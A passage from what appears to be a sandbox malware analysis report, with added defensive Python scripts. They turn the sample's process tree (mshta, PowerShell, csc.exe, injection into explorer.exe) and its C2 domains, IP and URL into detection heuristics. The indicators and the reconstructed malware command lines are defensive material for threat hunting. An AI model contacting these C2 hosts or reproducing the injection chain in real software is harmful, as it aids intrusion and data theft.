            DNS/IP: api10.laptok.at 47.241.19.44 (ports 49716, 49717, 49719), CNNIC-ALIBABA-US-NET-AP AlibabaUSTechnologyCoLtdC, United States
        started iexplore.exe
        started iexplore.exe
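The process tree above is the part of this report a responder can turn into host-side detection logic directly: the Sigma titles the report cites (mshta spawning a shell, csc.exe compiling from a user-writable folder), the injection edges into explorer.exe and RuntimeBroker.exe, and the OpenDNS lookup launched from the injected explorer.exe. The script below is an added example, not part of the Joe Sandbox report and not the sample's code: it encodes that tree as records and runs those heuristics over it. Node ids and parent/child relations are transcribed from the graph; the full image paths and all command lines are constructed for the example (the graph does not show them), and the second csc.exe response-file name is assumed by analogy with the 3he3buld.0.cs / 3he3buld.dll files the graph does show.

```python
"""Heuristics over the process tree drawn in this report's behavior graph."""
import ntpath
from typing import List, NamedTuple, Tuple


class Proc(NamedTuple):
    node: int       # node id as drawn in the graph
    image: str      # full path, supplied for this example (the graph shows only the name)
    parent: int     # parent node id (2 is the graph root, the sample itself)
    relation: str   # "started" or "injected", as drawn in the graph
    cmdline: str    # constructed for this example; the graph does not show command lines


# Transcribed from the graph; node 52 ("4 other processes") is omitted. The csc.exe
# response-file paths keep the report's own "..." truncation; the second name is
# assumed by analogy with the 3he3buld.0.cs / 3he3buld.dll files the graph shows.
PROCESSES: List[Proc] = [
    Proc(10, r"C:\Windows\System32\loaddll32.exe", 2, "started", "loaddll32.exe earmarkavchd.dll"),
    Proc(13, r"C:\Windows\System32\mshta.exe", 2, "started", "mshta.exe"),
    Proc(15, r"C:\Program Files\Internet Explorer\iexplore.exe", 2, "started", "iexplore.exe"),
    Proc(17, r"C:\Windows\System32\control.exe", 10, "started", "control.exe"),
    Proc(20, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", 13, "started", "powershell.exe"),
    Proc(23, r"C:\Program Files\Internet Explorer\iexplore.exe", 15, "started", "iexplore.exe"),
    Proc(26, r"C:\Program Files\Internet Explorer\iexplore.exe", 15, "started", "iexplore.exe"),
    Proc(28, r"C:\Program Files\Internet Explorer\iexplore.exe", 15, "started", "iexplore.exe"),
    Proc(30, r"C:\Windows\explorer.exe", 17, "injected", "explorer.exe"),
    Proc(34, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe", 20, "started",
         r'csc.exe /noconfig /fullpaths @"C:\Users\user\AppData\...\l4vfe2li.cmdline"'),
    Proc(37, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe", 20, "started",
         r'csc.exe /noconfig /fullpaths @"C:\Users\user\AppData\Local\...\3he3buld.cmdline"'),
    Proc(39, r"C:\Windows\System32\conhost.exe", 20, "started", "conhost.exe"),
    Proc(41, r"C:\Windows\System32\cmd.exe", 30, "started", "cmd.exe"),
    Proc(44, r"C:\Windows\System32\RuntimeBroker.exe", 30, "injected", "RuntimeBroker.exe"),
    Proc(46, r"C:\Windows\System32\RuntimeBroker.exe", 30, "injected", "RuntimeBroker.exe"),
    Proc(48, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe", 34, "started", "cvtres.exe"),
    Proc(50, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe", 37, "started", "cvtres.exe"),
    Proc(54, r"C:\Windows\System32\nslookup.exe", 41, "started",
         "nslookup myip.opendns.com resolver1.opendns.com"),
    Proc(57, r"C:\Windows\System32\conhost.exe", 41, "started", "conhost.exe"),
]

SHELLS = {"cmd.exe", "powershell.exe"}


def _name(image: str) -> str:
    return ntpath.basename(image).lower()


def ancestry(procs: List[Proc], node: int) -> List[str]:
    """Image names from `node` up to the root, self first."""
    by_node = {p.node: p for p in procs}
    chain = []
    while node in by_node:
        chain.append(_name(by_node[node].image))
        node = by_node[node].parent
    return chain


def injection_edges(procs: List[Proc]) -> List[Tuple[str, str]]:
    """(injector, target) pairs for every edge the graph draws as 'injected'."""
    by_node = {p.node: p for p in procs}
    return [(_name(by_node[p.parent].image), _name(p.image))
            for p in procs if p.relation == "injected" and p.parent in by_node]


def findings(procs: List[Proc]) -> List[str]:
    by_node = {p.node: p for p in procs}
    out = []
    for p in procs:
        chain = ancestry(procs, p.node)
        name = chain[0]
        parent = chain[1] if len(chain) > 1 else "<sample>"
        cmd = p.cmdline.lower()
        # Code injected into a Windows process (explorer.exe, RuntimeBroker.exe here).
        if p.relation == "injected":
            out.append(f"node {p.node}: {parent} injected into {name}")
        # "MSHTA Spawning Windows Shell" (the Sigma rule the report cites).
        if name in SHELLS and parent == "mshta.exe":
            out.append(f"node {p.node}: mshta.exe spawned {name}")
        # A shell whose parent is itself an injection target.
        if name in SHELLS and p.parent in by_node and by_node[p.parent].relation == "injected":
            out.append(f"node {p.node}: {name} started from injected {parent}")
        # "Suspicious Csc.exe Source File Folder": compiling from a user-writable path.
        if name == "csc.exe" and "\\appdata\\" in cmd:
            out.append(f"node {p.node}: csc.exe compiling from AppData (chain: {' <- '.join(chain)})")
        # Public IP discovery via OpenDNS, launched from the injected explorer.exe.
        if name == "nslookup.exe" and "myip.opendns.com" in cmd:
            out.append(f"node {p.node}: external IP lookup (chain: {' <- '.join(chain)})")
    return out


if __name__ == "__main__":
    for line in findings(PROCESSES):
        print(line)
```

Against the tree transcribed from this graph, the heuristics fire eight times: the mshta.exe to powershell.exe edge, both csc.exe compilations, the three injection edges, cmd.exe being started from the injected explorer.exe, and the nslookup external IP lookup. On a real host the same checks would be fed from Sysmon process-creation (event 1) and CreateRemoteThread (event 8) records instead of a hand-built list.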

Contacted Public IPs

IP            Domain   Country        ASN    ASN Name                                            Malicious
47.241.19.44  unknown  United States  45102  CNNIC-ALIBABA-US-NET-AP AlibabaUSTechnologyCoLtdC   false

Private

IP
192.168.2.1

Contacted Domains

Name                            IP              Active
myip.opendns.com                84.17.52.25     true
c56.lepini.at                   47.241.19.44    true
resolver1.opendns.com           208.67.222.222  true
api3.lepini.at                  47.241.19.44    true
api10.laptok.at                 47.241.19.44    true
g.msn.com                       unknown         unknown
222.222.67.208.in-addr.arpa     unknown         unknown

Contacted URLs

Name: http://api10.laptok.at/api1/XO7QtVtOxvAU4dkxK/MUnrl2paNhM_/2FhuHDAlai0/NYk3fgMRD21K6x/275eVNVSoFX1z_2Fdgzow/MjYIlNw6pXOFZtoH/ck22OsEBi4g5A21/99QRfbFqCod1fjkNsK/XxVSIrdVG/7FHa2ER9Ft02LqAkeU18/04NkD5rjB5JZqGFdQLM/maVmTCXIlwp0EX02aBt_2F/Clo4eegFdQ1lk/P1pW4ZJ5/wIbd6IdM2um9GQiRmu4HTYW/_2FpOuqNYz/HTi5jYJ7JeAd_0A_0/Dg9X8gZJHmh_/2B_2FHgF5eg/hemqUNvmE05Kam/e7yAaZ9rb60RXTZYuOS2q/HQUlA_2F4Fhmtp/3js
Malicious: false
Antivirus Detection: Avira URL Cloud: safe
Reputation: unknown
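The three tables above are the network indicators worth carrying out of this report: the C2 domains and their shared address 47.241.19.44, the single C2 URL, and the OpenDNS pair (a query for myip.opendns.com sent to resolver1.opendns.com returns the querying host's public address, which is why the injected explorer.exe ran it). The script below is an added example, not part of the report and not the sample's code: it matches constructed DNS, HTTP and TCP log lines against those indicators. The log lines and their format are constructed for this example; the URL-shape rule generalises from the one URL observed here (many slash-separated alphanumeric segments under /api<digits>/, carrying underscore-escaped hex pairs such as _2F and _2B), and that generalisation is an assumption, labelled as such in the code.

```python
"""Match constructed network log lines against the IOCs in this report."""
import re
from urllib.parse import urlsplit

# IOCs transcribed from the Contacted Domains / IPs / URLs tables above.
C2_DOMAINS = {"api10.laptok.at", "c56.lepini.at", "api3.lepini.at"}
C2_IPS = {"47.241.19.44"}
# Also in the report, but not C2: the OpenDNS pair is the usual way to learn
# the victim's public IP (nslookup myip.opendns.com resolver1.opendns.com).
EXTERNAL_IP_LOOKUP = {"myip.opendns.com", "resolver1.opendns.com"}
C2_URL = ("http://api10.laptok.at/api1/XO7QtVtOxvAU4dkxK/MUnrl2paNhM_/2FhuHDAlai0/"
          "NYk3fgMRD21K6x/275eVNVSoFX1z_2Fdgzow/MjYIlNw6pXOFZtoH/ck22OsEBi4g5A21/"
          "99QRfbFqCod1fjkNsK/XxVSIrdVG/7FHa2ER9Ft02LqAkeU18/04NkD5rjB5JZqGFdQLM/"
          "maVmTCXIlwp0EX02aBt_2F/Clo4eegFdQ1lk/P1pW4ZJ5/wIbd6IdM2um9GQiRmu4HTYW/"
          "_2FpOuqNYz/HTi5jYJ7JeAd_0A_0/Dg9X8gZJHmh_/2B_2FHgF5eg/hemqUNvmE05Kam/"
          "e7yAaZ9rb60RXTZYuOS2q/HQUlA_2F4Fhmtp/3js")

# Shape of that URL: /api<digits>/ then many slash-separated alphanumeric segments
# carrying underscore-escaped hex pairs (_2F, _2B, _0A). Assumption: using this
# shape as a signature generalises from the single URL observed in this report.
C2_PATH_RE = re.compile(r"^/api\d*/(?:[A-Za-z0-9_]+/){6,}[A-Za-z0-9_]*$")
ESCAPED_PAIR_RE = re.compile(r"_(?:2F|2B|0A)")


def url_shape_suspicious(url: str) -> bool:
    path = urlsplit(url).path
    return bool(C2_PATH_RE.match(path) and ESCAPED_PAIR_RE.search(path))


# Constructed log lines (not from the report). Formats:
#   <ts> dns  <src> query A <name> [@server]
#   <ts> http <src> <dst>:<port> <method> <url>
#   <ts> tcp  <src> <dst>:<port>
SAMPLE_LOG = "\n".join([
    "2020-11-20T10:01:02Z dns 192.168.2.22 query A g.msn.com",
    "2020-11-20T10:01:05Z http 192.168.2.22 47.241.19.44:80 GET " + C2_URL,
    "2020-11-20T10:01:09Z dns 192.168.2.22 query A c56.lepini.at",
    "2020-11-20T10:02:30Z dns 192.168.2.22 query A myip.opendns.com @208.67.222.222",
    "2020-11-20T10:03:00Z http 192.168.2.22 93.184.216.34:443 GET https://example.com/api1/docs",
    "2020-11-20T10:03:20Z http 192.168.2.22 203.0.113.5:80 GET "
    "http://cdn.example.net/api7/aB3dE/Fg9_2FhI/jK1lM/nO5pQ_2B/rS7tU/vW9xY_0A/zA2bC/qq",
    "2020-11-20T10:04:00Z tcp 192.168.2.22 47.241.19.44:49717",
    "2020-11-20T10:04:10Z dns 192.168.2.22 query A api3.lepini.at",
])


def classify(line: str):
    """Return (verdict, reason) for one line, or None when nothing matches."""
    parts = line.split()
    if len(parts) < 4:
        return None
    kind = parts[1]
    if kind == "dns" and len(parts) >= 6:
        name = parts[5].lower().rstrip(".")
        if name in C2_DOMAINS:
            return ("c2", f"DNS query for known C2 domain {name}")
        if name in EXTERNAL_IP_LOOKUP:
            return ("info", f"external IP discovery via {name}")
        return None
    if kind in ("http", "tcp"):
        dst = parts[3].rsplit(":", 1)[0]
        if dst in C2_IPS:
            return ("c2", f"connection to known C2 address {dst}")
        if kind == "http" and len(parts) >= 6:
            url = parts[5]
            host = (urlsplit(url).hostname or "").lower()
            if host in C2_DOMAINS:
                return ("c2", f"HTTP request to known C2 domain {host}")
            if url_shape_suspicious(url):
                return ("suspect", "URL path has the Gozi-style shape seen in this report")
    return None


def scan(log_text: str):
    """(line number, verdict, reason) for every line that matches an indicator."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        verdict = classify(line)
        if verdict:
            hits.append((n, verdict[0], verdict[1]))
    return hits


if __name__ == "__main__":
    for n, verdict, reason in scan(SAMPLE_LOG):
        print(f"line {n}: {verdict:7} {reason}")
```

The exact-match rules are what the report supports directly; the shape rule is there to catch a rotated C2 host using the same URL generator, at the cost of needing tuning against the site's own traffic, and it is kept at a lower "suspect" verdict for that reason. The OpenDNS lookup is reported as informational because it is common benign traffic on its own; it becomes interesting only in combination with the process ancestry the behavior graph shows.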